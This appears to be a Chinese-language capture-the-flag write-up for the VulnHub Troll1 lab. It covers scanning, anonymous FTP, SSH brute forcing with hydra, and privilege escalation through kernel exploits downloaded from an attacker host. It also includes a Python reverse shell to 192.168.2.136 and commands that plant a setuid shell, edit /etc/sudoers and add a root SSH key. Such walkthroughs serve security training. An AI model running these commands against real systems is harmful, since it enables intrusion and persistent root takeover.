vulnhub-troll1

概述

信息收集

主机发现

nmap -sP  192.168.2.0/24

Nmap scan report for 192.168.2.133
Host is up (0.012s latency).

端口扫描

nmap -p-  192.168.2.133 
Starting Nmap 7.92 ( https://nmap.org ) 
Nmap scan report for 192.168.2.133
Host is up (0.024s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

sudo nmap -p 21,22,80 -A -T4 -sS 192.168.2.133
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) 
Nmap scan report for 192.168.2.133
Host is up (0.046s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.2.136
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 50:2B:73:A0:02:39 (Tenda Technology,Ltd.Dongguan branch)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   46.43 ms 192.168.2.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.02 seconds

目录遍历

dirsearch -u http://192.168.2.133/ -x 403 -r

​ 使用dirsearch没有找到有用的信息。

ftp匿名

​ 从上面的端口的服务探测，可以看到ftp可以匿名登录，而且下面存在一个lol.pcap文件。

ftp 192.168.2.133

Wireshark

​ 通过Wireshark追踪tcp流

​ tcp.stream 1和3都显示文件secret_stuff.txt，tcp.stream 2内容如下：

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

——————————翻译————————
好吧，好吧，你不只是一个聪明的小恶魔吗，你几乎找到了 sup3rs3cr3tdirlol :-P

糟透了，你离得太近了……得加倍努力！

secret_stuff.txt
sup3rs3cr3tdirlol

sup3rs3cr3tdirlol

​ web的根目录和secret目录下均没找到secret_stuff.txt，但在根目录下找到了sup3rs3cr3tdirlol路径。

http://192.168.2.133/sup3rs3cr3tdirlol/

​ 将文件下载后通过strings查看一下文件的字符串。

wget http://192.168.2.133/sup3rs3cr3tdirlol/roflmao 
strings roflmao

Find address 0x0856BF to proceed

0x0856BF

收集到的信息

good_luck
which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
this_folder_contains_the_password
Pass.txt
Good_job_:)

漏洞利用

ssh爆破

​ 将收集到的信息放到文件dic.txt中，爆破登录账号密码。

hydra -L dic.txt -P dic.txt ssh://192.168.2.133:22

[22][ssh] host: 192.168.2.133   login: overflow   password: Pass.txt

权限提升

wget http://192.168.2.136:1111/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

wget http://192.168.2.136:1111/40839.c
gcc -pthread 40839.c -o dirty -lcrypt


wget http://192.168.2.136:1111/a.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow a.cpp -lutil

wget http://192.168.2.136:1111/40839.c
gcc -pthread 40839.c -o dirty -lcrypt

ofs

searchsploit 37292
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

wget http://192.168.2.136:1111/37292.c
gcc 37292.c -o ofs
./ofs

计划任务—执行py脚本

脚本跑出来的可以写的文件中，

​ 修改次脚本来提权。

反弹shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.2.136",2233))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

os.system执行系统命令

创建root可执行程序

os.system('cp /bin/sh /tmp/exp')
os.system('chmod u+s /tmp/exp')

$ ./exp
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# whoami
root

添加用户到/etc/sudoers

将用户溢出添加到sudoers文件中可以sudo su到root用户

os.system('echo "overflow ALL=(ALL) ALL" >> /etc/sudoers')

写入id_rsa.pub

os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa *" >> /root/.ssh/authorized_keys')

flag

# cat proof.txt
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc